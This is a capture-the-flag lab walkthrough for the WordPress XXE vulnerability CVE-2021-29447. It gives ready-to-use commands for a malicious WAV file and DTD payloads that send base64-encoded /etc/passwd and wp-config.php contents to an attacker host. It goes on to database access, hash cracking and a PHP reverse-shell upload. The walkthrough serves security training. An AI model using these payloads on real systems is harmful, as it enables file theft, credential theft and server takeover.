|Room [Subscription Required]||Wordpress CVE-2021-29447|
Vulnerability allow a authenticated user whith low privilages upload a malicious WAV file that could lead to remote arbitrary file disclosure and server-side request forgery (SSRF).
Task 01: Introduction
An XXE vulnerability consists of an injection that takes advantage of the poor configuration of the XML interpreter allowing to include external entities, this attack is performed against an application that interprets XML language in its parameters.
Researchers at security firm SonarSource have discover a xml external entity injection (XXE) security flaw in WordPress (in the Media Library) . The vulnerability can be exploited only when this CMS runs in PHP 8 and the attacking user has permissions to upload media files.
Arbitrary File Disclosure: the content of any file on the host’s file system could be retrieved, e.g. wp-config.php which contains sensitive data such as database credentials.
Server-Side Request Forgery (SSRF): HTTP requests could be made on behalf of the WordPress installation. Depending on the environment, this can have a serious impact.
Exploiting the vulnerability
A wordpress site affected by this vulnerability has been identified in the enumeration process with the help of the wpscan tool.
It has been identified that the author user uses weak credentials.
user: test-corp password: test
user with permissions for upload media files.
Creating a malicious WAV file.
It’s very easy, in your bash console
cat poc.wav echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://YOURSEVERIP:PORT/NAMEEVIL.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
In your attacker pc create a dtd with the code execute in the web server.
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Note: for read wordpress files use the syntax “../WP-FILE.php”
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../index.php"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
Now up a http server in the folder that created the file.
php -S 0.0.0.0:PORT
Now upload the malicious wav
When upload the malicious wav in your server you’ll see this output, for this exercise I used zlib library for this razon it’s necesary use for decode the base64.
Create a php file whith the code:
<?php echo zlib_decode(base64_decode('base64her'));
why this? It is the method that has been used to read sensitive wordpres files.
Other method for read local files in the web server is:
<!ENTITY % file SYSTEM "php://filter/read=convert.base64-encode/resource=/etc/passwd"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://YOURSERVERIP:PORT/?p=%file;'>" >
For decode this is very easy, in bash console use:
echo "base64" | base64 -d
Task 02: Ready Set Go
echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00<?xml version="1.0"?><!DOCTYPE ANY[<!ENTITY % remote SYSTEM '"'"'http://10.17.4.40/payload.dtd'"'"'>%remote;%init;%trick;]>\x00' > payload.wav
<!ENTITY % file SYSTEM "php://filter/zlib.deflate/read=convert.base64-encode/resource=../wp-config.php"> <!ENTITY % init "<!ENTITY % trick SYSTEM 'http://10.17.4.40/?p=%file;'>" >
- hosted with PHP
php -S IP 80
- got the callback
2.1: Use the vulnerability CVE-2021-29447 to read the wordpres configuration file
2.2: Based on the results of #1, what is the name of the database for WordPress?
2.3: Based on the results of #1, what are the credentials you found?
2.4: Enurate and identify what is the dbms installed on the server?
Ans is on
wp-config pate itself
2.5: Based on the results of #4, what is the dbms version installed on the server?
look if DB is open for remote access:
Connect and verify the version:
2.6: Based on the results of #4, what port is the dbms running on?
nmap san reveals
2.7: Compromise the dbms, What is the encrypted password located in the wordpress users table with id 1??
find all DB:
wordpressDB and see all tables:
let’s read the
read the flag:
2.8: Based on the results of #7, What is the password in plaint text?
save the hash in your machine
2.9: Compromise the machine and locate flag.txt
tried bruteforce with the found
let’s login with newly found creds on website.
login worked for the website! and we’re into admin account!
let’s upload a php web-shell and gain access that way
cp /usr/share/laudanum/php/php-reverse-shell.php shell.phpshell to current directory and change IP & port
upload the code to the webpage, I’m uploading to
seems we can’t edit
let’s try with
we can edit
let’s call that page and get the backdoor call:
read the file: